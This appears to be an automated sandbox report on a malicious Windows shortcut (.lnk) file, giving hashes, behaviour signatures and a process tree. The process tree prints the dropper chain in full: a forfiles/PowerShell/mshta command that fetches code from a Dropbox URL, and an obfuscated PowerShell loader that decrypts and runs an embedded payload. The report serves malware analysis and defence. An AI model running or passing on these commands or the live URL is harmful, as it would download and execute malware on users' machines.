Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    27-02-2024 05:21

General

  • Target

    707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk

  • Size

    1KB

  • MD5

    c7945d1c593363055616d6e427b8e2a2

  • SHA1

    2c5f9b6fc746efb5caad3b31755c801f9ad1ac7b

  • SHA256

    707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50

  • SHA512

    7fb10ad46450b7ceeebdf3e9144447c59c22c67a6c7d026a1dbebcb665ee6bf1588958c5388e0358f18ecf71539dfd67050bb7ffeb516d2904d5cd77a1786d19

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1132
    • C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2292
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
        3⤵
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2484
        • C:\Windows\system32\mshta.exe
          "C:\Windows\system32\mshta.exe" https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
          4⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:2456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $xRnrtl = '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';$PWFaA = 'd0hDTktlemN0SlFHRXFla0Rjb094cnRoUGlSR050VmI=';$rtbrSxS = New-Object 'System.Security.Cryptography.AesManaged';$rtbrSxS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$rtbrSxS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$rtbrSxS.BlockSize = 128;$rtbrSxS.KeySize = 256;$rtbrSxS.Key = [System.Convert]::FromBase64String($PWFaA);$jIXAy = [System.Convert]::FromBase64String($xRnrtl);$rSpXWojt = $jIXAy[0..15];$rtbrSxS.IV = $rSpXWojt;$mXooDLjjw = $rtbrSxS.CreateDecryptor();$KHnzkbgXQ = $mXooDLjjw.TransformFinalBlock($jIXAy, 16, $jIXAy.Length - 16);$rtbrSxS.Dispose();$iIauy = New-Object System.IO.MemoryStream( , $KHnzkbgXQ );$Izyrh = New-Object System.IO.MemoryStream;$thcRRYmqg = New-Object System.IO.Compression.GzipStream $iIauy, ([IO.Compression.CompressionMode]::Decompress);$thcRRYmqg.CopyTo( $Izyrh );$thcRRYmqg.Close();$iIauy.Close();[byte[]] $QWoIKfh = $Izyrh.ToArray();$KKSHrJAF = [System.Text.Encoding]::UTF8.GetString($QWoIKfh);$KKSHrJAF | powershell -
            5⤵
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1168
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
              6⤵
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1204

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WQS6Z484B6BTW1XCZ8AJ.temp

    Filesize

    7KB

    MD5

    7901212826eb130a49dd170cd9e46291

    SHA1

    3e2d163be64f8c261b4685c2e4cd0e93d567bd64

    SHA256

    e5ca5cef2dc4acacc0d2047b84d2be4e23590980a6421157c186f51a63e74825

    SHA512

    f4649624a43bdbca84460ce441eed2fad4f5e61a2605739d296d1cd565a6ae2501efbdc82df910b1f1a1d2972a9b0779b0374aa15f13b98dd42d4d4b3da72fd8

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
